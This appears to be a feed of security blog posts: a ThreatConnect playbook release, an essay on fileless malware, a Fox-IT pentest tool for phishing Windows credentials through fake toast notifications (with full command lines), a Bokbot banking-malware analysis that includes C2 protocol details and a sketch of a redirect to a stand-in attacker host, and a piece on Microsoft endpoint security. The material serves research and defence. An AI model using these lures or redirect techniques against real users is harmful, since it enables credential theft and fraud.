Increasing adoption of orchestration is the goal, but oftentimes what's forgotten is the improvements on the back-end that must be in place to support this. To prepare for the uptick in Playbooks, ThreatConnect customers can now roll out Playbook Servers that allow them to easily and effectively scale ThreatConnect to handle thousands of Playbook executions per day, while prioritizing what's important. Each Server is its own machine, and once the Playbook Server is deployed, customers can set up multiple Playbook Workers to handle and monitor concurrent Playbook executions.

Whereas typically Playbooks are sent to the Playbook Queue and grabbed by the Default Playbook Server to be executed, we've significantly improved Quality of Service by letting users allocate Private Servers to an Organization for the highest priority Playbooks to get ahead of the queue. You can also enable high availability (HA) by deploying multiple Playbook Servers. If at any point a Playbook Server crashes, the remaining servers take over responsibilities. There is no single point of failure!

Six Workers deployed across three different Playbook Servers. This setup can easily handle six concurrent Playbooks and thousands of executions
to meet the needs of threat intel teams while allowing for high priority Playbooks to execute in real-time.


Priority Setting to Ensure Playbooks Execution

Not all Playbooks are created equal. We know that. You know that. And now the ThreatConnect Platform can know that too. Some Playbooks perform basic enrichments and send routine notifications, while others hunt for mission critical intel and loop in the entire security team about potential major incidents.

Directly from the Playbook itself, users can now assign a High/Medium/Low priority setting from a drop-down menu. Playbooks deemed "High Priority" essentially jump the queue when an action triggers them. Users can even assign specific servers to execute only high-priority Playbooks, so that one is always available to complete the most critical operations. Think of this as a ThreatConnect Fast Pass!
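The queue-jumping behavior can be modeled with a standard priority queue. The ThreatConnect engine's internals are not public, so the class and method names below are purely illustrative:

```python
import heapq
import itertools

PRIORITY = {"high": 0, "medium": 1, "low": 2}

class PlaybookQueue:
    """Priority queue sketch: high-priority playbooks jump ahead of earlier,
    lower-priority ones; equal priorities preserve submission order (FIFO)."""

    def __init__(self):
        self._heap = []
        self._seq = itertools.count()  # tie-breaker preserving FIFO order

    def submit(self, name, priority="medium"):
        heapq.heappush(self._heap, (PRIORITY[priority], next(self._seq), name))

    def next_playbook(self):
        return heapq.heappop(self._heap)[2]

q = PlaybookQueue()
q.submit("enrich-indicator", "low")
q.submit("notify-team", "medium")
q.submit("contain-incident", "high")
print(q.next_playbook())  # contain-incident runs first despite arriving last
```

Submitting a high-priority playbook after several low-priority ones still dequeues it first, which is the "Fast Pass" behavior described above.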


We all want to make sure the important things are getting done first. We run through prioritization exercises daily, and it becomes even more critical when dealing with security operations. The ability to set Playbooks at different priorities enables the most important things to get done first.

Environment Server Improvements

Environment Servers enable ThreatConnect to communicate with technologies operating on other networks. Although Environment Servers have long allowed ThreatConnect to communicate with such technologies, they are now "headless", meaning they no longer need their own user interface in order to work (making them easier to set up).

ThreatConnect 5.7 removes the necessity of logging into this special UI to deploy Environment Servers. Now, users can download them directly from the UI in an "all-in-one" bundle that can be deployed inside a network.

Environment Server configured and ready for installation and monitoring.


These improvements introduce a new, simplified download of the environment server which translates to a secure and "turn-key" deployment inside your network!

At ThreatConnect, we encourage increased adoption and advanced use cases of orchestration for our customers. That's reflected in our ThreatConnect Platform capabilities and our dedication to improving backend functionality to support it. Avoid "automation burnout" and ensure that the most critical jobs get done first and everything gets done fast.

Join us for a quick 30-minute bi-weekly walkthrough of the ThreatConnect Platform. This is a live demo with one of our security engineers who will be happy to answer any questions about how ThreatConnect will fit into your current security program.


The post ThreatConnect 5.7 Release Shows Advancements in Playbooks Capabilities appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

The Language and Nature of Fileless Attacks Over Time

The language of cybersecurity evolves in step with changes in attack and defense tactics. You can get a sense for such dynamics by examining the term fileless. It fascinates me not only because of its relevance to malware—which is one of my passions—but also because of its knack for agitating many security practitioners.

I traced the origins of “fileless” to 2001, when Eugene Kaspersky (of Kaspersky Lab) used it in reference to the Code Red worm’s ability to exist solely in memory. Two years later, Peter Szor defined the term in a patent for Symantec, explaining that such malware doesn’t reside in a file, but instead “appends itself to an active process in memory.”

Eugene was prophetic in predicting that fileless malware “will become one of the most widespread forms of malicious programs,” given antivirus tools’ ineffectiveness against such threats. Today, when I look at the ways in which malware bypasses detection, the evasion techniques often fall under the fileless umbrella, though the term has expanded beyond its original meaning.

Fileless was synonymous with in-memory until around 2014.

The adversary’s challenge with purely in-memory malware is that it disappears once the system restarts. In 2014, Kevin Gossett’s Symantec article explained how Poweliks malware overcame this limitation by using the legitimate Windows programs rundll32.exe and powershell.exe to maintain persistence, extracting and executing malicious scripts from the registry. Kevin described this threat as “fileless” because it avoided placing code directly on the file system. Paul Rascagnères at G Data further explained that Poweliks infected systems by using a booby-trapped Microsoft Word document.

The Poweliks discussion, and similar malware that appeared afterwards, set the tone for the way fileless attacks are described today. Yes, fileless attacks strive to keep clearly malicious code solely or mostly in memory. They also tend to involve malicious documents and scripts, and they often misuse utilities built into the operating system and abuse various capabilities of Windows, such as the registry, to maintain persistence.

However, the growing ambiguity behind the modern use of the term fileless is making it increasingly difficult to understand what specific methods fileless malware uses for evasion. It’s time to disambiguate this word to hold fruitful conversations about our ability to defend against its underlying tactics.

Here’s my perspective on the methods that comprise modern fileless attacks:

  • Malicious Documents: They can act as flexible containers for other files. Documents can also carry exploits that execute malicious code. They can execute malicious logic that begins the infection and initiates the next link in the infection chain.
  • Malicious Scripts: They can interact with the OS without the restrictions that some applications, such as web browsers, might impose. Scripts are harder for anti-malware tools to detect and control than compiled executables. In addition, they offer an opportunity to split malicious logic across several processes.
  • Living Off the Land: Microsoft Windows includes numerous utilities that attackers can use to execute malicious code with the help of a trusted process. These tools allow adversaries to “trampoline” from one stage of the attack to another without relying on compiled malicious executables.
  • Malicious Code in Memory: Memory injection abuses features of Microsoft Windows to interact with the OS even without exploiting vulnerabilities. Attackers can wrap their malware into scripts, documents or other executables, extracting payload into memory during runtime.

While some attacks and malware families are fileless in all aspects of their operation, most modern malware that evades detection includes at least some fileless capabilities. Such techniques allow adversaries to operate in the periphery of anti-malware software. The success of these attack methods is the reason for the continued use of the term fileless in discussions among cybersecurity professionals.

Language evolves as people adjust the way they use words and the meaning they assign to them. This certainly happened to fileless, as the industry looked for ways to discuss evasive threats that avoided the file system and misused OS features. For a deeper dive into this topic, read the following three articles upon which I based this overview:

Phishing – Ask and ye shall receive

During penetration tests, our primary goal is to identify the different paths that can be used to reach the goal(s) agreed upon with our customers. This often succeeds due to insufficient hardening, lack of awareness, or poor password hygiene. Sometimes we do get access to a resource but do not have the username or password of the user that is logged on. In that case, a solution can be to simply ask the user for credentials in order to increase our access or escalate our privileges throughout the network. This blogpost details how the default credential-gathering module in a pentesting framework like Metasploit can be further improved, and introduces a new tool and a Cobalt Strike module that demonstrate these improvements.

Current situation

Let’s say that we have a meterpreter running on our target system but were unable to extract user credentials. Since the meterpreter is not running with sufficient privileges, we also cannot access the part of the memory where the passwords reside. To ask the user for their credentials, we can use a post module to spawn a credential box on the user’s desktop that asks for their credentials. This credential box looks like the one in the image below.


While this often works in practice, a few problems arise with using this technique:

  • The style of the input box stems from Windows XP. When newer versions of Windows ask for your credentials, a different type of input box is used;
  • The credential box spawns out of the blue. Even though a message and a title can be provided, it does not really look genuine and lacks a scenario in which a prompt for credentials would be justified.

A better solution

Because of these issues, this technique will perhaps not work on more security-aware users. Those users can be interesting targets as well, so we created a new script that solves the aforementioned problems. In creating a realistic scenario, the guiding question was: “What would work on us?” The answer must at least entail the following:

  • The credential box should be genuine and the same as the one that Windows uses;
  • The credential box should not be spawned out-of-the-blue; the user must be persuaded or should expect a credential box;
  • If (error) messages are used, the messages should be realistic. Real life examples are even better;
  • No or limited visible indications that the scenario is not real.

As a proof of concept, Fox-IT created a tool that uses the following two scenarios:

  • Notifications that stem from an (installed) application;
  • System notifications that can be postponed.

With this, the attacker can use his creativity to deceive the user. Below are some examples that were created during the development of this tool:

Outlook lost its connection to Microsoft Exchange; the user must supply credentials to reestablish the connection.


Password that expires within a short period of time.


The second scenario imitates notifications from Windows itself, such as pending updates that need to be installed. The notification toast tricks the user into thinking that the updates can be postponed or dismissed. When the user clicks on the notification toast the user will be asked to supply their credentials.


If the user clicks on one of these notifications, the following credential box will pop up. The text of the credential box is fully customizable.


Once the user has submitted their credentials, the result is printed on the console, where it can be intercepted with a tool of your choosing, such as Cobalt Strike. We created an aggressor script for Cobalt Strike that extends the user interface with a variety of phishing options.


Clicking on one of these options will launch the phishing attack on the remote computer. If users enter their credentials, the aggressor script will store them in Cobalt Strike as well. The tool and the Cobalt Strike aggressor script are available on Fox-IT’s GitHub page:


Technical details

During the development of this tool, there were some hurdles we needed to overcome. At first, we created a tool that pops a notification balloon. That worked quite well; however, the originating source was shown in the balloon as well. It’s not really convincing when Windows PowerShell ISE asks for Outlook credentials, so that solution did not satisfy us.


In recent versions of Windows, toast notifications were introduced. These notifications look almost the same as the notification balloons we used earlier but work entirely differently. Using toast notifications solved the problem of the originating source being shown. However, it proved impossible to attach event handlers to toast notifications with native PowerShell. We needed an additional library that acts as a wrapper, which can be found on the following GitHub page:

That library solved part of the issue, but it needed to be present on the filesystem of the target computer. That would leave traces of our attack, and we want to leave as few traces of our malicious code as possible. Therefore, we encoded the library as base64 and stored it inside the PowerShell script. The base64 equivalent of the library is decoded and loaded from memory at runtime, leaving no trace on the filesystem once the tool has executed. So now we had a tool capable of sending genuine-looking toast notifications. Because of how Windows works, we could also create an extra layer of trust by using an application ID as the source of the notification toast. That way, if you can find the corresponding AppID, the toast notification looks as if it was issued by the application rather than by an attacker.
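The embed-and-decode trick described here is generic: a dependency's bytes are stored as a base64 string inside the script and decoded back into memory at runtime. A minimal Python sketch of the round trip (the library bytes are a placeholder; the original tool does this in PowerShell with a .NET assembly):

```python
import base64

# Packaging step: embed the dependency's raw bytes as a base64 string
# literal inside the script (placeholder bytes here, not a real library).
library_bytes = b"placeholder wrapper-library bytes"
embedded = base64.b64encode(library_bytes).decode("ascii")

# Runtime step: decode the string back into bytes in memory; nothing is
# written to the filesystem, so no file artifact of the library is left.
loaded = base64.b64decode(embedded)
assert loaded == library_bytes
print(len(loaded), "bytes reconstructed in memory")
```

The same pattern applies in any language that can load code or assemblies from a byte buffer rather than from a file path.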

The notification toast supports the following:

  • Custom toast notification title;
  • Custom credential box title;
  • Custom multiline toast notification message.

To make it more personal, it is possible to use references to attributes that are part of the System.DirectoryServices.AccountManagement.UserPrincipal object. These attributes can be found in the following Technet article:

Additionally, the application scenario supports the following extra features when an application name is provided and can be found by the tool:

  • AppID lookup for adding extra layer of credibility. If no AppID is found, the tool will default to control panel;
  • Extraction of the application icon. The extracted icon will be used in the notification toast;
  • If no process is given or the process cannot be found, the tool will extract the information icon from the C:\Windows\system32\shell32.dll library. By modifying the script, it is easy to incorporate icons from other libraries as well;
  • Hiding of application processes. All windows will be hidden from the user for extra persuasion. Visibility is restored once the tool finishes or the user has supplied their credentials.

Cmdline examples

For the examples above, the following one-liners were used:

Outlook connection:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Microsoft Office Outlook" -ToastMessage "Connection to Microsoft Exchange has been lost.`r`nClick here to restore the connection" -Application "Outlook" -credBoxTitle "Microsoft Outlook" -credBoxMessage "Enter password for user ‘{emailaddress|samaccountname}'" -ToastType Application -HideProcesses

Updates are available:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Updates are available" -ToastMessage "Your computer will restart in 5 minutes to install the updates" -credBoxTitle "Credentials needed" -credBoxMessage "Please specify your credentials in order to postpone the updates" -ToastType System -Application "System Configuration"

Password expires:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Consider changing your password" -ToastMessage "Your password will expire in 5 minutes.`r`nTo change your password, click here or press CTRL+ALT+DELETE and then click 'Change a password'." -Application "Control Panel" -credBoxTitle "Windows Password reset" -credBoxMessage "Enter password for user '{samaccountname}'" -ToastType Application


No recommendations are specific to this phishing technique; however, some more generic recommendations still apply:

  • Check if PowerShell script logging and transcript logging is enabled;
  • Raise security awareness;
  • Although it is quite hard to distinguish a fake notification toast from a genuine notification toast, users should have a paranoid approach when it comes to processes asking for their credentials.

Bokbot: The (re)birth of a banker

This blogpost is a follow-up to a presentation with the same name, given at SecurityFest in Sweden by Alfred Klason.


Bokbot (aka: IcedID) came to Fox-IT’s attention around the end of May 2017 when we identified an unknown sample in our lab that appeared to be a banker. This sample was also provided by a customer at a later stage.

Analysis of the bot and the operation quickly revealed that it is connected to a well-known actor group behind an operation publicly known as 76service, and later Neverquest/Vawtrak, dating back to 2006.

Neverquest operated for a number of years before an arrest led to its downfall in January 2017. Just a few months afterwards, we discovered a new bot with a completely new code base but built on ideas and strategies from the Neverquest days. Their business ties remain intact: they still utilize services from the same groups as before, but they have also expanded to new services.

This suggests that at least part of the group behind Neverquest is still operating, now using Bokbot. It is unclear, however, how many people from the core group have continued on with Bokbot.

Bokbot is still a relatively new bot, only recently reaching a production state in which its authors have streamlined and tested their creation. Even though it is a new bot, they still have strong connections within the cybercrime underworld, which enables them to maintain and grow their operation, for example by distributing their bot to a larger number of victims.

Looking back at the history and the people behind this operation, it is highly likely that this threat is not going away anytime soon. Fox-IT rather expects an expansion of both the botnet's size and its target list.

76service and Neverquest

76service was, what one could call, a big-data mining service for fraud, powered by CRM (aka: Gozi). It was able to gather huge amounts of data from its victims using, for example, form grabbing, in which authorization and login credentials are harvested from forms the infected victim submits to websites.

76service panel login page

The service was initially spotted in 2006 and was put into production in 2007, where the authors started to rent out access to their platform. When given access to the platform, the fraudulent customers of this service could free-text search in the stolen data for credentials that provide access to online services, such as internet banking, email accounts and other online platforms.

76service operated uninterrupted until November 2010, when a Ukrainian national named Nikita Kuzmin was arrested in connection with the operation. This marked the end of 76service.

Nice Catch! – The real name of Neverquest

A few months before his arrest, Nikita shared the source code of CRM within a private group of people, enabling them to continue developing the malware. This, over time, led to the appearance of multiple Gozi strains, but one stood out more than the others: Catch.

Catch was the name given internally by the malware authors, but to the security community and the public it was known as Vawtrak or Neverquest.

During the investigation into Catch it became clear that 76service and Catch shared several characteristics. Both, for example, separated their botnets into projects within the panel used for administering their infrastructure and botnets. Instead of having one huge botnet, they assigned every bot build a project ID that the bot would use to let the Command & Control (C2) server know which project it belonged to.

76service and Catch also shared the same business model, where they shifted back and forth between a private and rented model.

The private business model meant that they made use of their own botnet, for their own gain, and the rented business model meant that they rented out access to their botnet to customers. This provided them with an additional income stream, instead of only performing the fraud themselves.

The shift between business models could usually be correlated with either backend servers being seized or people with business ties to the group being arrested. These types of events might have spooked the group into limiting their infrastructure, closing down access for customers.

For the sake of simplicity, Catch will from here on be referred to as Neverquest in this post.

“Quest means business” – Affiliations

A Neverquest infection might not be the only malware lurking on a compromised system. Neverquest has been known to cooperate with other crimeware groups, either to distribute additional malware or to use existing botnets to distribute Neverquest itself.

During the investigation and tracking of Neverquest, Fox-IT identified the following ties:

Crimeware/malware group Usage/functionality
Dyre Download and execute Dyre on Neverquest infections
TinyLoader & AbaddonPOS Download and execute TinyLoader on Neverquest infections. TinyLoader was later seen downloading AbaddonPOS (as mentioned by Proofpoint)
Chanitor/Hancitor Neverquest leverages Chanitor to infect new victims.

By leveraging these business connections, especially the one with Dyre, Neverquest was able to maximize the monetization of its bots: Neverquest could determine whether a bot was of interest to the group and, if not, hand it off to Dyre, which could cast a wider net, for example targeting a bigger or different geographical region and utilizing the bot in a different way.

More on these affiliations in a later section.

The never ending quest comes to an end

Neverquest remained at large from around 2010, causing huge financial losses ranging from ticket fraud to wire fraud to credit card fraud. Nevertheless, in January 2017 the quest came to an end when an individual named Stanislav Lisov was arrested in Spain. This individual proved to be a key player in the operation: soon after the arrest, the backend servers of Neverquest went offline, never to come back, marking the end of a six-year fraud operation.

A more detailed background on 76service and Neverquest can be found in a blogpost by PhishLabs.

A wild Bokbot appears!

Early samples of Bokbot were identified in our lab in May 2017 and were also provided to us by a customer. At the time, the malware was being distributed to US victims by the Geodo (aka: Emotet) spam botnet. The name Bokbot is based on a researcher who worked on the very early versions of the malware (you know who you are 😉 ).

Initial thoughts were that this was a new banking module for Geodo, as this group had not been involved in banking/fraud since May 2015. This scenario was quickly dismissed after we discovered evidence linking Bokbot to Neverquest, which is further outlined hereafter.

Bokbot internals

First, let’s do some housekeeping and look into some of the technical aspects of Bokbot.


All communication between a victim and the C2 server is sent over HTTPS using POST- and GET-requests. The initial request sent to the C2 is a POST-request containing some basic information about the machine it's running on, as seen in the example below. Any additional requests, such as requests for configs or modules, are sent as GET-requests, except for the uploading of stolen data (files, HTML code, screenshots or credentials), which the victim submits using POST-requests.

Even though the above request is from a very early version (14) of the bot, the principle still applies to the current version (101), first seen 2018-07-17.

URL param. Comment
b Bot identifier; contains the information needed to identify the individual bot and where it belongs. More information on this in a later section.
d Type of uploaded information. For example screenshot, grabbed form, HTML or a file
e Bot build version
i System uptime
POST-data param. Comment
k Computer name (Unicode, URL-encoded)
l Member of domain… (Unicode, URL-encoded)
j Bot requires signature verification for C2 domains and self-updates
n Bot running with privilege level…
m Windows build information (version, arch., build, etc.)

The parameters that are not included in the table above are used to report stolen data to the C2.
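Putting the tables above together, a beacon can be sketched as follows. Every value, the POST endpoint and the C2 host below are invented for illustration; only the parameter names come from the observed traffic.

```python
from urllib.parse import urlencode

# Hypothetical reconstruction of a Bokbot beacon from the parameter
# tables above; the values and the C2 host are made up.
url_params = {
    "b": "PROJECT_BOTID",    # bot identifier (project + bot ID)
    "d": "0",                # type of uploaded information
    "e": "101",              # bot build version
    "i": "3600",             # system uptime
}
post_params = {
    "k": "DESKTOP-EXAMPLE",  # computer name
    "l": "WORKGROUP",        # domain membership
    "n": "user",             # privilege level
    "m": "10.0.17134 x64",   # Windows build information
}

url = "https://c2.example.com/upload?" + urlencode(url_params)
body = urlencode(post_params)
print(url)
print(body)
```

The bot identifier in `b` and the other parameters travel in the URL, while the machine fingerprint travels in the POST body, matching the split described above.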

The C2 response for this particular bot version is a simple set of integers telling the bot which command(s) should be executed. This is the only C2 response that is unencrypted; all other responses are encrypted using RC4. Some responses, like the configs, are also compressed using LZMAT.

After a response is decrypted, the bot will check if the first 4 bytes equal “zeus”.


If the first 4 bytes are equal to “zeus”, it will decompress the rest of the data.

The reason for choosing "zeus" as the signature remains unknown. It could be an intentional false flag, an attempt to trick analysts into thinking this might be a new ZeuS strain; similar deceptive techniques have been used before. A simpler explanation is that the developer had an ironic sense of humor and chose the first malware name that came to mind as the 4-byte signature.
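The decrypt-then-check logic can be sketched in a few lines of Python. The key and payload below are made up, and the LZMAT decompression step is stubbed out (LZMAT is not available in the standard library), so this only illustrates the RC4 decryption and the "zeus" signature check described above.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def handle_response(key, body):
    """Decrypt a C2 response and check the 4-byte signature."""
    plain = rc4(key, body)
    if plain[:4] != b"zeus":     # signature check described above
        return None              # not a compressed payload
    return plain[4:]             # LZMAT decompression would happen here

# Demo: "encrypt" a fake config and run it through the handler
# (RC4 is symmetric, so the same function encrypts and decrypts).
key = b"hypothetical-key"
wire = rc4(key, b"zeus" + b"config-bytes")
print(handle_response(key, wire))   # b'config-bytes'
```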


Bokbot supports three different types of configs, all of which are in a binary format rather than a structured format like XML (which is used by TheTrick, for example).

Config Comment
Bot The latest C2 domains
Injects Contains targets which are subject to web injects and redirection attacks
Reporting Contains targets related to HTML grabbing and screenshots

The first config, which includes the bot C2 domains, is signed. This prevents a takeover of any of the C2 domains from resulting in the bots being sinkholed. Updates of the bot itself are also signed.

The other two configs control how the bot interacts with the targeted entities, such as redirecting and modifying web traffic related to, for example, internet banking and/or email providers, for the purpose of harvesting credentials and account information.

The reporting config serves a more generic purpose: it is used not only for screenshots but also for HTML grabbing, which captures a complete HTML page if a victim browses to an "interesting" website or if the page contains a specific keyword. This enables the actors to conduct reconnaissance for future attacks, such as writing web injects for a previously unknown target.
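The grab-or-not decision just described can be illustrated with a small sketch. This is not actual Bokbot code, and the target URL and keywords below are invented; they stand in for the entries a real reporting config would carry.

```python
# Illustrative sketch (not actual Bokbot code): decide whether a page
# should be grabbed, based on URL substrings or body keywords.
REPORT_URLS = ["bank.example.com/login"]              # invented targets
REPORT_KEYWORDS = ["wire transfer", "routing number"]  # invented keywords

def should_grab(url: str, html: str) -> bool:
    """Return True if the page matches a target URL or keyword."""
    if any(target in url for target in REPORT_URLS):
        return True
    return any(kw in html.lower() for kw in REPORT_KEYWORDS)

print(should_grab("https://bank.example.com/login", "<html>...</html>"))  # True
print(should_grab("https://news.example.org/", "Weather report"))         # False
```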

Geographical foothold

Ever since its appearance, Bokbot has been heavily focused on targeting financial institutions in the US, even though it still gathers any data the actors deem interesting, such as credentials for online services.

Based on Fox-IT's observation of the malware's spread and the accompanying configs, North America appears to be Bokbot's primary hunting ground, although high infection counts have also been seen in the following countries:

  • United States
  • Canada
  • India
  • Germany
  • Netherlands
  • France
  • United Kingdom
  • Italy
  • Japan

“I can name fingers and point names!” – Connecting the two groups

On a binary level, the two bots do not show much similarity beyond the fact that they both communicate over HTTPS and use RC4 in combination with LZMAT compression. But this wouldn't amount to much of an attribution, as it is a combination also used in, for example, ZeuS Gameover, Citadel and Corebot v1.

The table below provides a short summary of the similarities between the groups.

Connection Comment
Bot and project ID format The usage of projects and the bot ID generation are unique to these groups, along with the format in which this information is communicated to the C2.
Inject config The injects and redirection entries are very similar, and the format hasn't been seen in any other malware family.
Reporting config The targeted URLs and “interesting” keywords are almost identical between the two.
Affiliations The two groups share business affiliations with other crimeware groups.

Bot ID, URL pattern and project IDs

When both Neverquest and Bokbot communicate with their C2 servers, they have to identify themselves by sending their unique bot ID along with a project ID.

An example of the string that the server uses in order to identify a specific bot from its C2 communication is shown below:


The placement of this string differs between the families: Neverquest (in its latest version) placed it, encoded, in the Cookie header field, while older versions of Neverquest sent it in the URL. Bokbot, on the other hand, sends it in the URL, as shown in a previous section.

One important difference is that Neverquest used a simple number for its project ID (7 in the example above). Bokbot, on the other hand, uses a different, unknown format for its project ID. One theory is that this could be a CRC checksum of the project name, to prevent leaking the number of projects or their names, but this is pure speculation.

Another difference is that Bokbot has implemented an 8-bit checksum calculated over the project ID and the bot ID. This checksum is validated on the server side; if it doesn't match, no commands are returned.
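The server-side validation idea can be sketched as follows. The actual checksum algorithm is not described here, so a simple byte-sum modulo 256 serves as a hypothetical stand-in, and both identifiers are made up.

```python
# Hypothetical stand-in for Bokbot's 8-bit checksum: the real algorithm
# is unknown, so a byte-sum mod 256 illustrates the validation scheme.
def checksum8(project_id: str, bot_id: str) -> int:
    return sum((project_id + bot_id).encode()) % 256

def server_accepts(project_id: str, bot_id: str, claimed: int) -> bool:
    # The server recomputes the checksum; on a mismatch, no commands
    # are returned to the bot.
    return checksum8(project_id, bot_id) == claimed

pid, bid = "0xDEADBEEF", "12345678"             # made-up identifiers
good = checksum8(pid, bid)
print(server_accepts(pid, bid, good))           # True
print(server_accepts(pid, bid, (good + 1) % 256))  # False
```

A check like this is cheap for the operator and raises the bar slightly for researchers probing the C2 with hand-crafted requests.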

To date, a total of 20 projects across 25 build versions have been observed, and those numbers keep growing.

Inject config – Dynamic redirect structure

The inject config contains not only web injects but also redirects. Bokbot supports both static redirects, which redirect a fixed URL, and dynamic redirects, which redirect a request whose URL matches a regular expression.

The above example is a redirect attack from a Neverquest config. A regular expression is matched against the requested URL; if it matches, the name of the requested file and its extension are extracted. These two strings are then used to construct a redirect URL controlled by the actors: $1 is replaced with the file name and $2 with the file extension.


How does this compare with Bokbot?


Notice how the redirect URL contains $1 and $2, just as with Neverquest. This could of course be a coincidence, but it is worth noting that this construct has only been observed in Neverquest and Bokbot.
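The mechanics of such a dynamic redirect can be mimicked in a few lines. The pattern, the targeted bank URL and the attacker URL below are all invented; Python's capture groups stand in for the $1/$2 placeholders used in the configs.

```python
import re

# Invented dynamic-redirect rule: capture the file name and extension
# from the requested URL and rebuild a URL under attacker control.
pattern = re.compile(r"^https://bank\.example\.com/scripts/(\w+)\.(js|css)$")

def redirect(url: str):
    m = pattern.match(url)
    if not m:
        return None                      # no match: request passes through
    name, ext = m.group(1), m.group(2)   # $1 and $2 in the config's notation
    return f"https://evil.example.net/{name}.{ext}"

print(redirect("https://bank.example.com/scripts/auth.js"))
# https://evil.example.net/auth.js
```

Because the match is a regular expression rather than a fixed URL, one rule covers every script under the targeted path, which is what makes the dynamic variant more powerful than a static redirect.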

Reporting config

This config was one of the very first things that hinted at a connection between the two groups. Comparing the configs makes it quite clear that there is a big overlap in interesting keywords and URLs:


Neverquest is on the left and Bokbot on the right. Note that this is a simple string comparison between the configs which also includes URLs that are to be excluded from reporting.

“Guilt by association” – Affiliations

Neither of these groups is short on connections in the cybercrime underworld. As already mentioned, Neverquest had ties with Dyre, a group which by itself caused substantial financial losses. It is also important to note that Dyre didn't completely go away after the group was dismantled, but was rather replaced by TheTrick, which gives a further hint of a connection.

Neverquest affil. Bokbot affil. Comment
Dyre TheTrick Neverquest downloads & executes Dyre
Bokbot downloads & executes TheTrick
TinyLoader TinyLoader Neverquest downloads & executes TinyLoader which downloads AbaddonPOS
Bokbot downloads & executes TinyLoader, additional payload remains unknown at this time
Chanitor Chanitor Neverquest utilizes Chanitor for distribution of Neverquest
Bokbot utilizes Chanitor for distribution of Bokbot, downloads SendSafe spam malware to older infections.
Geodo Bokbot utilizes Geodo for distributing Bokbot
Gozi-ISFB Bokbot utilizes Gozi-ISFB for distributing Bokbot

There are a few interesting observations with the above affiliations. The first is for the Chanitor affiliation.

When Bokbot was being distributed by Chanitor, existing Bokbot infections running an older version than the one Chanitor distributed would receive a download & execute command pointing to the SendSafe spambot, used by the Chanitor group to send spam. This suggests that the two groups may have exchanged "infections for infections".

The Bokbot affiliation with Geodo is something that cannot be linked to Neverquest, mostly due to the fact that Geodo has not been running its spam operation long enough to overlap with Neverquest.

The graph below shows all the observed affiliations to date.


Events over time

All of the above information has been collected over time while tracking Bokbot's development. The events and observations are laid out in the timeline below.


The first occurrence of TheTrick being downloaded was in July 2017, but Bokbot has since downloaded TheTrick on several occasions.

At the end of December 2017 there was little Bokbot activity, likely because of the holidays; it is not uncommon for cybercriminals to decrease their activity around the turn of the year. Supposedly everyone needs a holiday, even cybercriminals. They did, however, push an inject config to some bots that targeted *.com with the goal of injecting JavaScript to mine the Monero cryptocurrency. As soon as an infected user visited a website with a .com top-level domain (TLD), the browser would start mining Monero for the Bokbot actors. This was likely an attempt to passively monetize the bots while the actors were on holiday.

Bokbot remains active and shows no signs of slowing down. Fox-IT will continue to monitor these actors closely.

Making Sense of Microsoft’s Endpoint Security Strategy

Microsoft is no longer content to simply delegate endpoint security on Windows to other software vendors. The company has released, fine-tuned or rebranded multiple security technologies in a way that will have lasting effects on the industry and Windows users. What is Microsoft's endpoint security strategy and how is it evolving?

Microsoft offers numerous endpoint security technologies, most of which include "Windows Defender" in their name. Some resemble built-in OS features (e.g., Windows Defender SmartScreen), others are free add-ons (e.g., Windows Defender Antivirus), while some are commercial enterprise products (e.g., the EDR component of Windows Defender Advanced Threat Protection). I created a table that explains the nature and dependencies of these capabilities in a single place. Microsoft is in the process of unifying these technologies under the Windows Defender Advanced Threat Protection branding umbrella, the name that originally referred solely to the company's commercial incident detection and investigation product.

Microsoft's approach to endpoint security appears to pursue the following objectives:
  • Motivate other vendors to innovate beyond the commodity security controls that Microsoft offers for its modern OS versions. Windows Defender Antivirus and Windows Defender Firewall with Advanced Security (WFAS) on Windows 10 are examples of such tech. Microsoft has been expanding these essential capabilities to be on par with similar features of commercial products. This not only gives Microsoft control over the security posture of its OS, but also forces other vendors to tackle the more advanced problems on the basis of specialized expertise or other strategic abilities.
  • Expand the revenue stream from enterprise customers. To centrally manage Microsoft's endpoint security layers, organizations will likely need to purchase System Center Configuration Manager (SCCM) or Microsoft Intune. Obtaining some of Microsoft's security technologies, such as the EDR component of Windows Defender Advanced Threat Protection, requires upgrading to the high-end Windows Enterprise E5 license. By bundling such commercial offerings with other products, rather than making them available in a standalone manner, the company motivates customers to shift all aspects of their IT management to Microsoft.
In pursuing these objectives, Microsoft developed the building blocks that are starting to resemble features of commercial Endpoint Protection Platform (EPP) products. The resulting solution is far from perfect, at least at the moment:
  • Centrally managing and overseeing these components is difficult for companies that haven’t fully embraced Microsoft for all their IT needs or that lack expertise in technologies such as Group Policy.
  • Making sense of the security capabilities, interdependencies and licensing requirements is challenging, frustrating and time-consuming.
  • Most of the endpoint security capabilities worth considering are only available for the latest versions of Windows 10 or Windows Server 2016. Some have hardware dependencies and are incompatible with older hardware.
  • Several capabilities have dependencies that are incompatible with other products.  For instance, security features that rely on Hyper-V prevent users from using the VMware hypervisor on the endpoint.
  • Some technologies are still too immature or impractical for real-world deployments. For example, using my Windows 10 system after enabling the Controlled folder access feature became unbearable after a few days.
  • The layers fit together in an awkward manner at times. For instance, Microsoft provides two app whitelisting technologies—Windows Defender Application Control (WDAC) and AppLocker—that overlap in some functionality.
While infringing on territory traditionally dominated by third parties on the endpoint, Microsoft leaves room for security vendors to provide value and to work together with Microsoft's security technologies. Some of Microsoft's endpoint security technologies still feel disjointed, but they're becoming less so as the company fine-tunes its approach to security and matures its capabilities.

Microsoft is steadily guiding enterprises toward embracing Microsoft as the de facto provider of IT products. Though not all enterprises will embrace an all-Microsoft vision for IT, many will. Endpoint security vendors will need to crystallize their role in the resulting ecosystem, expanding and clarifying their unique value proposition. (Coincidentally, that's what I'm doing at Minerva Labs, where I run product management.)

Retired Malware Samples: Everything Old is New Again

